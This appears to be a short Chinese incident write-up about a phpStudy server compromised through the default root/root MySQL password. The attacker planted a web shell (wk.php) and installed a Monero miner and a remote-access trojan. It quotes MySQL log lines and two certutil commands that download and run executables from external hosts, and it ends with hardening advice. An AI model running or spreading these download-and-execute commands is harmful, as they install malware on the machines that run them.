今天客户服务器上出现报警,查找了下原因,发现根目录下有wk.php
E:\phpStudy\MySQL\bin\mysqld.exe, Version: 5.5.53 (MySQL Community Server (GPL)). started with: TCP Port: 3306, Named Pipe: MySQL Time Id Command Argument 2173 Quit 190207 18:31:59 2174 Connect root@localhost on 2174 Query SET NAMES 'utf8' COLLATE 'utf8_general_ci' 2174 Init DB mysql 2174 Init DB mysql 2174 Query SELECT ''wk.exe');?>' 2174 Query SHOW VARIABLES LIKE 'language' 2174 Quit 190207 18:32:00 2175 Connect root@localhost on 2175 Query SET NAMES 'utf8' COLLATE 'utf8_general_ci' 2175 Init DB mysql 2175 Init DB mysql 2175 Query set global general_log='off'
查了下原因,是针对phpStudy网站服务器进行批量入侵的挖矿木马
攻击者对互联网上的服务器进行批量扫描,发现易受攻击的phpStudy系统后,利用用户在安装时未进行修改的MySQL弱密码进行登录,并进一步植入WebShell,然后通过shell下载挖矿木马挖门罗币。
中招主机通过phpStudy一键部署PHP环境,默认情况下包含phpinfo及phpMyAdmin并且任何人都可以访问,同时安装的MySQL默认口令为弱口令密码root/root,且开启在外网3306端口,在未设置安全组或者安全组为放通全端口的情况下,受到攻击者对于phpStudy的针对性探测,并且暴露了其MySQL弱口令。
特点:
(1)都是通过探测phpStudy搭建的php环境进行攻击
(2)通过webshell植入挖矿木马时,白利用certutil.exe
命令1
certutil.exe -urlcache -split -f http://down.ctosus.ru/wkinstall.exe &wkinstall.exe &del wkinstall.exe
命令2
certutil.exe -urlcache -split -f http://m4.rui2.net/upload/12/2016/10/wk.exe &wk.exe
(3)挖矿木马通过bat脚本启动,且矿机采用xmr-stak挖矿工具
(4)在挖矿的同时植入大灰狼远控木马
安全建议:
(1)修复系统漏洞
(2)集成环境,在安装结束后应及时修改MySQL密码为强密码,最低密码长度不要低于11位,组合最好是字母数字和符号;删除l.php(探针文件),避免被黑客探测入侵
(3)增加安全策略
参考:https://s.tencent.com/research/report/642.html